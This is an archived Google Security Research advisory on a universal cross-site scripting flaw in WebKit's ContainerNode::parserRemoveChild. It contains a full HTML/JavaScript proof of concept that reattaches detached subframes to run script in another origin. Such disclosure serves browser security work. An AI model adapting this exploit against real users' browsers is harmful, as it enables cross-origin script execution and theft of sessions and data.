WebKit ContainerNode::parserRemoveChild (2) Universal Cross Site Scripting

2017-05-25T00:00:00
ID PACKETSTORM:142663
Type packetstorm
Reporter Google Security Research
Modified 2017-05-25T00:00:00

Description

                                        
                                            ` WebKit: UXSS via ContainerNode::parserRemoveChild (2)   
  
  
  
  
Here's a snippet of ContainerNode::parserRemoveChild.  
  
void ContainerNode::parserRemoveChild(Node& oldChild)  
{  
disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)  
...  
document().notifyRemovePendingSheetIfNeeded(); <<---- (b)  
}  
  
subframes are detached at (a). But In |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again.  
  
PoC:  
<html>  
<head>  
</head>  
<body>  
<script>  
  
let xml = `  
<body>  
<div>  
  
<p>  
<script>  
let p = document.querySelector('p');  
let link = p.appendChild(document.createElement('link'));  
link.rel = 'stylesheet';  
link.href = 'data:,aaaaazxczxczzxzcz';  
  
let btn = document.body.appendChild(document.createElement('button'));  
btn.id = 'btn';  
btn.onfocus = () => {  
btn.onfocus = null;  
  
window.d = document.querySelector('div');  
window.d.remove();  
  
link.remove();  
document.body.appendChild(p);  
  
let m = p.appendChild(document.createElement('iframe'));  
setTimeout(() => {  
document.documentElement.innerHTML = '';  
  
m.onload = () => {  
m.onload = null;  
  
m.src = 'javascript:alert(location);';  
var xml = \`  
<svg xmlns="<a href="http://www.w3.org/2000/svg" title="" class="" rel="nofollow">http://www.w3.org/2000/svg</a>">  
<script>  
document.documentElement.appendChild(parent.d);  
</sc\` + \`ript>  
<element a="1" a="2" />  
</svg>\`;  
  
var tmp = document.documentElement.appendChild(document.createElement('iframe'));  
tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));  
};  
m.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>  
}, 0);  
};  
  
location.hash = 'btn';  
</scrip` + `t>  
  
</p>  
</div>  
</body>`;  
  
let tf = document.body.appendChild(document.createElement('iframe'));  
tf.src = URL.createObjectURL(new Blob([xml], {type: 'text/html'}));  
  
</script>  
</body>  
</html>  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`